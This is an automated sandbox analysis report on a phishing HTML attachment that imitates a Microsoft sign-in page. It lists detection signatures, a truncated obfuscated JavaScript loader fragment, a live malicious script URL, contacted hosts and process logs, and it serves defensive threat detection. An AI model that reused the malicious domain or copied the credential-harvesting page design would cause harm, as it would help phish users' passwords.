Edit tour

Windows Analysis Report
ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html

Overview

General Information

Sample name:	ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html
Analysis ID:	1448976
MD5:	5d4a90e3d318b416d017f66001da91e0
SHA1:	dbba96e168e35d40967dae28d109d01ab1447cf6
SHA256:	e4ec93ec23ab28ca3bd839954aa1a8edd0e421e69db7aca16ca86e115693fb4c
Infos:

Detection

HTMLPhisher

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Yara detected HtmlPhish10

AI detected suspicious javascript

Detected javascript redirector / loader

HTML Script injector detected

HTML file submission containing password form

HTML page contains obfuscate javascript

Phishing site detected (based on logo match)

Suspicious Javascript code found in HTML file

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML title does not match URL

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Invalid 'forgot password' link found

Invalid T&C link found

JA3 SSL client fingerprint seen in connection with other malware

None HTTPS page querying sensitive user data (password, username or email)

Stores files to the Windows start menu directory

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

chrome.exe (PID: 6396 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1924,i,8006472540143360931,17686916618025515442,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
0.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://fiveradio-newbam.com/jsnom.js

Avira URL Cloud: Label: phishing

Phishing

Yara detected HtmlPhish10

Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: 0.0.pages.csv, type: HTML

AI detected suspicious javascript

Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html

LLM: Score: 8 Reasons: The code uses 'document.write' with 'unescape' to inject a script element dynamically. This is a common technique used in malicious scripts to obfuscate the code and load external resources without the user's knowledge. The script sets various attributes including 'src' to an external URL, which could potentially load malicious content. Additionally, the use of 'document.addEventListener' to prevent default actions on context menus suggests an attempt to hinder user actions, which is suspicious behavior. DOM: 0.0.pages.csv

Detected javascript redirector / loader

Source: ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html

HTTP Parser: Low number of body elements: 0

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: New script, src: https://cdn.socket.io/4.6.0/socket.io.min.js
Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: New script, src: https://cdn.socket.io/4.6.0/socket.io.min.js

HTML page contains obfuscate javascript

Source: ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html	HTTP Parser: document.write( unescape( %3C%73%63%72%69%70%74%3E%0A%20%20%20%20%20%20%20%20%76%61%72%20%73%63%20%3
Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: document.write( unescape( %3C%73%63%72%69%70%74%3E%0A%20%20%20%20%20%20%20%20%76%61%72%20%73%63%20%3
Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: document.write( unescape( %3C%73%63%72%69%70%74%3E%0A%20%20%20%20%20%20%20%20%76%61%72%20%73%63%20%3

Phishing site detected (based on logo match)

Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html

Matcher: Template: microsoft matched

Suspicious Javascript code found in HTML file

Source: ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html

HTTP Parser: document.write

Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html

HTTP Parser: Base64 decoded: https://fiveradio-newbam.com

Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html

HTTP Parser: Title: Authenticating ... does not match URL

Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html

HTTP Parser: Invalid link: Forgot password?

Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: Invalid link: Privacy & cookies
Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: Invalid link: Privacy & cookies

Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html

HTTP Parser: <input type="password" .../> found

Source: ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/ATT0100556_socage.it_Tuesday,%20May%2028,%202024%20(1).html	HTTP Parser: No <meta name="copyright".. found

Source: unknown

HTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49754 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.9:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.9:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.9:49755 version: TLS 1.2

Source: global traffic

TCP traffic: 192.168.2.9:49740 -> 1.1.1.1:53

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 13.107.246.45 13.107.246.45
Source: Joe Sandbox View	IP Address: 13.107.246.67 13.107.246.67
Source: Joe Sandbox View	IP Address: 192.229.133.221 192.229.133.221
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 104.21.84.200 104.21.84.200

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown

HTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49754 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 23.43.61.160
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jsnom.js HTTP/1.1Host: fiveradio-newbam.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=usUrKCa4GBP5D7k&MD=2Hnvowrb HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=usUrKCa4GBP5D7k&MD=2Hnvowrb HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: cdn.socket.io
Source: global traffic	DNS traffic detected: DNS query: fiveradio-newbam.com
Source: global traffic	DNS traffic detected: DNS query: www.w3schools.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: chromecache_102.4.dr	String found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
Source: chromecache_102.4.dr	String found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
Source: chromecache_102.4.dr	String found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
Source: chromecache_102.4.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
Source: chromecache_102.4.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
Source: chromecache_102.4.dr	String found in binary or memory: https://softwarereviews.s3.amazonaws.com/production/favicons/offerings/3117/original/Sharepoint_icon
Source: chromecache_102.4.dr	String found in binary or memory: https://www.w3schools.com/w3css/4/w3.css

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443

Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.9:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.9:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.9:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.9:49755 version: TLS 1.2

Source: classification engine

Classification label: mal84.phis.winHTML@30/33@12/10

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT0100556_socage.it_Tuesday, May 28, 2024 (1).html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1924,i,8006472540143360931,17686916618025515442,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1924,i,8006472540143360931,17686916618025515442,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
